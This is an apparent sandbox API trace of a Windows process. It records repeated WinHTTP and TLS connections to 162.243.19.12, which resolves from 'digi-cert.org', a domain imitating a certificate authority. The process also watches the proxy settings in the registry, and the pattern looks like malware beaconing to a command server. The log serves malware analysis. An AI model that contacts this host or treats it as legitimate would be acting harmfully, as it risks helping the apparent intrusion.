	[0213.358] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19680
	[0213.360] WinHttpSetTimeouts (hInternet=0x2ad3bb19680, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0213.360] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0213.376] SetEvent (hEvent=0x6b8) returned 1
	[0213.376] select (in: nfds=0, readfds=0x2ad23b841f0, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b841f0, writefds=0x0, exceptfds=0x0) returned 1
	[0213.376] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0213.377] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0213.378] shutdown (s=0x7d0, how=2) returned 0
	[0213.383] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0213.383] closesocket (s=0x7d0) returned 0
	[0213.385] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0213.386] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9f0
	[0213.386] WSAConnect (in: s=0x7d0, name=0x2ad23b85988*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0213.494] closesocket (s=0x9f0) returned 0
	[0213.495] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b82930, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b86210, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b86210, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0213.496] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf950 | out: pvContextBuffer=0x2ad3badf950) returned 0x0
	[0213.496] send (in: s=0x7d0, buf=0x2ad23b862e0*, len=333, flags=0 | out: buf=0x2ad23b862e0*) returned 333
	[0213.496] recv (in: s=0x7d0, buf=0x2ad23b862e0, len=5, flags=0 | out: buf=0x2ad23b862e0*) returned 5
	[0213.602] recv (in: s=0x7d0, buf=0x2ad23b862e5, len=49, flags=0 | out: buf=0x2ad23b862e5*) returned 49
	[0213.602] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b82930, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b86520, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b86540, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b86540, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0213.602] recv (in: s=0x7d0, buf=0x2ad23b86630, len=5, flags=0 | out: buf=0x2ad23b86630*) returned 5
	[0213.603] recv (in: s=0x7d0, buf=0x2ad23b86655, len=1, flags=0 | out: buf=0x2ad23b86655*) returned 1
	[0213.603] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b82930, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b86728, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b86748, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b86748, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0213.603] recv (in: s=0x7d0, buf=0x2ad23b86838, len=5, flags=0 | out: buf=0x2ad23b86838*) returned 5
	[0213.603] recv (in: s=0x7d0, buf=0x2ad23b8685d, len=48, flags=0 | out: buf=0x2ad23b8685d*) returned 48
	[0213.603] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b82930, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b86960, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b86980, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b86980, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0213.605] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2a80 | out: pvContextBuffer=0x2ad3bad2a80) returned 0x0
	[0213.605] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b86ac8 | out: pBuffer=0x2ad23b86ac8) returned 0x0
	[0213.605] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b86b20 | out: pBuffer=0x2ad23b86b20) returned 0x0
	[0213.605] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b86b88 | out: pBuffer=0x2ad23b86b88) returned 0x0
	[0213.606] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0213.606] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0213.606] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb055d0
	[0213.606] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0213.606] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb055d0) returned 0x0
	[0213.606] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0213.607] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0213.608] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0213.608] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb055d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0213.608] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb055d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0213.609] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0213.610] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0213.611] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0213.612] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0213.612] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0213.612] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0213.612] SetLastError (dwErrCode=0x0) 
	[0213.612] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0213.613] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0213.613] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0213.614] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b89790, MessageSeqNo=0x0 | out: pMessage=0x2ad23b89790) returned 0x0
	[0213.615] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca1c0
	[0213.615] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca1c0*=((len=0x3b, buf=0x2ad23b86a50*), (len=0xd5, buf=0x2ad23b89598*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca1c0*=((len=0x3b, buf=0x2ad23b86a50*), (len=0xd5, buf=0x2ad23b89598*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0213.615] CoTaskMemFree (pv=0x2ad3baca1c0) 
	[0213.615] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0213.615] recv (in: s=0x7d0, buf=0x2ad23b89938, len=5, flags=0 | out: buf=0x2ad23b89938*) returned 5
	[0214.138] recv (in: s=0x7d0, buf=0x2ad23b8995d, len=1488, flags=0 | out: buf=0x2ad23b8995d*) returned 1488
	[0214.138] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b8a040, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b8a040, pfQOP=0x0) returned 0x0
	[0214.139] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0214.139] SetEvent (hEvent=0x6b8) returned 1
	[0214.173] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0225.174] CloseHandle (hObject=0x388) returned 1
	[0225.268] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0225.268] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x3f4) returned 0x0
	[0225.268] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9cc
	[0225.269] RegNotifyChangeKeyValue (hKey=0x3f4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9cc, fAsynchronous=1) returned 0x0
	[0225.269] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d4) returned 0x0
	[0225.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d8
	[0225.269] RegNotifyChangeKeyValue (hKey=0x9d4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d8, fAsynchronous=1) returned 0x0
	[0225.269] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9dc) returned 0x0
	[0225.269] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9e0
	[0225.269] RegNotifyChangeKeyValue (hKey=0x9dc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9e0, fAsynchronous=1) returned 0x0
	[0225.269] GetCurrentProcess () returned 0xffffffffffffffff
	[0225.269] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e4) returned 1
	[0225.269] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1b660
	[0225.270] WinHttpSetTimeouts (hInternet=0x2ad3bb1b660, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0225.270] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0225.284] SetEvent (hEvent=0x6b8) returned 1
	[0225.284] select (in: nfds=0, readfds=0x2ad23b91a38, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b91a38, writefds=0x0, exceptfds=0x0) returned 1
	[0225.284] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0225.285] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0225.285] shutdown (s=0x7d0, how=2) returned 0
	[0225.286] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0225.286] closesocket (s=0x7d0) returned 0
	[0225.287] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0225.288] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9ec
	[0225.288] WSAConnect (in: s=0x7d0, name=0x2ad23b931d0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0225.397] closesocket (s=0x9ec) returned 0
	[0225.397] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b90178, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b93a58, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b93a58, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0225.398] FreeContextBuffer (in: pvContextBuffer=0x2ad3bae01f0 | out: pvContextBuffer=0x2ad3bae01f0) returned 0x0
	[0225.398] send (in: s=0x7d0, buf=0x2ad23b93b28*, len=333, flags=0 | out: buf=0x2ad23b93b28*) returned 333
	[0225.398] recv (in: s=0x7d0, buf=0x2ad23b93b28, len=5, flags=0 | out: buf=0x2ad23b93b28*) returned 5
	[0225.504] recv (in: s=0x7d0, buf=0x2ad23b93b2d, len=49, flags=0 | out: buf=0x2ad23b93b2d*) returned 49
	[0225.505] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b90178, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b93d68, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b93d88, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b93d88, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0225.505] recv (in: s=0x7d0, buf=0x2ad23b93e78, len=5, flags=0 | out: buf=0x2ad23b93e78*) returned 5
	[0225.505] recv (in: s=0x7d0, buf=0x2ad23b93e9d, len=1, flags=0 | out: buf=0x2ad23b93e9d*) returned 1
	[0225.506] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b90178, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b93f70, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b93f90, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b93f90, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0225.506] recv (in: s=0x7d0, buf=0x2ad23b94080, len=5, flags=0 | out: buf=0x2ad23b94080*) returned 5
	[0225.506] recv (in: s=0x7d0, buf=0x2ad23b940a5, len=48, flags=0 | out: buf=0x2ad23b940a5*) returned 48
	[0225.506] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b90178, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b941a8, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b941c8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b941c8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0225.507] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad2b40 | out: pvContextBuffer=0x2ad3bad2b40) returned 0x0
	[0225.507] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b94310 | out: pBuffer=0x2ad23b94310) returned 0x0
	[0225.507] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b94368 | out: pBuffer=0x2ad23b94368) returned 0x0
	[0225.507] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b943d0 | out: pBuffer=0x2ad23b943d0) returned 0x0
	[0225.508] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06250) returned 0x2ad3bb06250
	[0225.508] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0225.508] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb06250
	[0225.509] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06250) returned 0x2ad3bb06250
	[0225.509] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb06250) returned 0x0
	[0225.509] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0225.509] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0225.510] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0225.510] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb06250, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0225.511] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb06250, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0225.512] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0225.515] CertDuplicateCertificateContext (pCertContext=0x2ad3bb06250) returned 0x2ad3bb06250
	[0225.517] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0225.518] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0225.518] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0225.518] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0225.518] SetLastError (dwErrCode=0x0) 
	[0225.518] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0225.519] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0225.519] CertFreeCertificateContext (pCertContext=0x2ad3bb06250) returned 1
	[0225.519] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b96fd8, MessageSeqNo=0x0 | out: pMessage=0x2ad23b96fd8) returned 0x0
	[0225.520] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9ec0
	[0225.520] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9ec0*=((len=0x3b, buf=0x2ad23b94298*), (len=0xd5, buf=0x2ad23b96de0*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9ec0*=((len=0x3b, buf=0x2ad23b94298*), (len=0xd5, buf=0x2ad23b96de0*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0225.520] CoTaskMemFree (pv=0x2ad3bac9ec0) 
	[0225.520] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0225.520] recv (in: s=0x7d0, buf=0x2ad23b97180, len=5, flags=0 | out: buf=0x2ad23b97180*) returned 5
	[0225.977] recv (in: s=0x7d0, buf=0x2ad23b971a5, len=1488, flags=0 | out: buf=0x2ad23b971a5*) returned 1488
	[0225.978] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b97888, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b97888, pfQOP=0x0) returned 0x0
	[0225.978] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0225.978] SetEvent (hEvent=0x6b8) returned 1
	[0226.026] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0247.029] CloseHandle (hObject=0x388) returned 1
	[0247.227] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0247.228] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x398) returned 0x0
	[0247.228] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f4
	[0247.228] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x3f4, fAsynchronous=1) returned 0x0
	[0247.229] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9cc) returned 0x0
	[0247.229] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d4
	[0247.229] RegNotifyChangeKeyValue (hKey=0x9cc, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d4, fAsynchronous=1) returned 0x0
	[0247.230] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d8) returned 0x0
	[0247.230] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9dc
	[0247.230] RegNotifyChangeKeyValue (hKey=0x9d8, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9dc, fAsynchronous=1) returned 0x0
	[0247.230] GetCurrentProcess () returned 0xffffffffffffffff
	[0247.230] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x9e0) returned 1
	[0247.231] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19240
	[0247.231] WinHttpSetTimeouts (hInternet=0x2ad3bb19240, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0247.231] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0247.246] SetEvent (hEvent=0x6b8) returned 1
	[0247.246] select (in: nfds=0, readfds=0x2ad23b9f280, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b9f280, writefds=0x0, exceptfds=0x0) returned 1
	[0247.247] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0247.249] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0247.250] shutdown (s=0x7d0, how=2) returned 0
	[0247.251] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0247.251] closesocket (s=0x7d0) returned 0
	[0247.254] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0247.255] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9e8
	[0247.255] CoTaskMemAlloc (cb=0xf) returned 0x2ad3bb1eb20
	[0247.256] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0xd7ef71bb20*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xd7ef71bb18 | out: ppResult=0xd7ef71bb18*=0x2ad3bb03d40*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x2ad3bb1f240*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0247.260] CoTaskMemFree (pv=0x2ad3bb1eb20) 
	[0247.260] CoTaskMemFree (pv=0x0) 
	[0247.260] FreeAddrInfoW (pAddrInfo=0x2ad3bb03d40*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g敪瑣", ai_addr=0x2ad3bb1f240*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0247.261] WSAConnect (in: s=0x7d0, name=0x2ad23ba0db8*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0247.374] closesocket (s=0x9e8) returned 0
	[0247.376] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b9d9c0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23ba1640, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23ba1640, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0247.377] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf7e0 | out: pvContextBuffer=0x2ad3badf7e0) returned 0x0
	[0247.377] send (in: s=0x7d0, buf=0x2ad23ba1710*, len=333, flags=0 | out: buf=0x2ad23ba1710*) returned 333
	[0247.377] recv (in: s=0x7d0, buf=0x2ad23ba1710, len=5, flags=0 | out: buf=0x2ad23ba1710*) returned 5
	[0247.484] recv (in: s=0x7d0, buf=0x2ad23ba1715, len=49, flags=0 | out: buf=0x2ad23ba1715*) returned 49
	[0247.485] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b9d9c0, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23ba1950, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23ba1970, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23ba1970, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0247.485] recv (in: s=0x7d0, buf=0x2ad23ba1a60, len=5, flags=0 | out: buf=0x2ad23ba1a60*) returned 5
	[0247.485] recv (in: s=0x7d0, buf=0x2ad23ba1a85, len=1, flags=0 | out: buf=0x2ad23ba1a85*) returned 1
